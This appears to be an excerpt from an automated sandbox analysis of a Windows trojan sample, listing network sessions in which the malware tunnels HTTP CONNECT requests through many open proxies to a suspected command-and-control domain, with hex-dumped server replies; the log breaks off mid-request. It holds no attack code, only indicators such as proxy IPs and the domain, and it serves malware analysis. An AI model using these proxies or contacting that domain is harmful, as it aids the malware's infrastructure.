                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1338192.168.2.853694115.171.217.4878915828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.421715021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1339192.168.2.854167104.17.37.235805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.440334082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.528480053 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1340192.168.2.85419074.207.235.21312215828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.452631950 CET132INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                Data Ascii: Maximum number of open connections reached.
                                                                                Feb 23, 2024 14:28:33.479511023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1341192.168.2.854132159.65.77.16885855828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.479199886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1342192.168.2.8541011.194.236.22950055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.495218992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.772787094 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1343192.168.2.854157158.255.215.50169935828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.504242897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.727159023 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1344192.168.2.854128109.194.22.6180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.516494036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1345192.168.2.851995192.99.37.195496135828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.516803980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.694761992 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.789177895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.882725954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:57.883651018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:09.882220984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:21.882246017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1346192.168.2.854123120.79.101.088885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.541857004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.916881084 CET309INHTTP/1.1 502 Bad Gateway
                                                                                Server: nginx/1.25.0
                                                                                Date: Fri, 23 Feb 2024 13:28:33 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.25.0</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1347192.168.2.854135187.19.127.25341535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.542061090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1348192.168.2.851949147.135.195.236437055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.542526007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.694839954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.789175987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.882757902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1349192.168.2.85412127.65.240.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.567473888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1350192.168.2.85327714.97.48.44805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.567579985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1351192.168.2.851930173.255.119.18805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.574615002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.693109035 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.695276976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.695193052 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1352192.168.2.85417347.243.114.19281805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.587665081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1353192.168.2.85419243.251.132.13380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.587668896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1354192.168.2.853729198.12.253.1502055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.587846994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.085655928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.695034981 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.585822105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382703066 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.141172886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.882746935 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:44.398071051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:51.241631985 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1355192.168.2.853556199.58.184.9741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.587939978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1356192.168.2.85416443.133.136.20888005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.624567032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1357192.168.2.853374167.172.159.43489835828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.670039892 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.694957972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.789174080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:45.882751942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1358192.168.2.853732103.143.9.8580885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.670101881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.846574068 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1359192.168.2.854076120.194.4.157825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:33.730329990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.456043005 CET319INHTTP/1.1 400 Bad Request
                                                                                Server: openresty
                                                                                Date: Fri, 23 Feb 2024 13:28:34 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 170
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1360192.168.2.85346534.23.45.223805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.000191927 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.629780054 CET836INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 13:28:48 GMT
                                                                                Server: Apache/2.4.58 (Ubuntu)
                                                                                Content-Length: 644
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 73 6f 70 6f 72 74 65 74 69 40 63 6f 64 65 31 30 30 2e 63 6f 6d 2e 70 79 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at soporteti@code100.com.py to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.58 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1361192.168.2.854212190.14.224.24436295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.014164925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1362192.168.2.85385712.186.205.122805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.072468042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.199481010 CET325INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.1
                                                                                Date: Fri, 23 Feb 2024 13:28:34 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1363192.168.2.853345178.128.82.105532995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.077487946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.882531881 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.882606030 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1364192.168.2.853915181.78.64.7580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:34.098284960 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.179477930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:40.195151091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
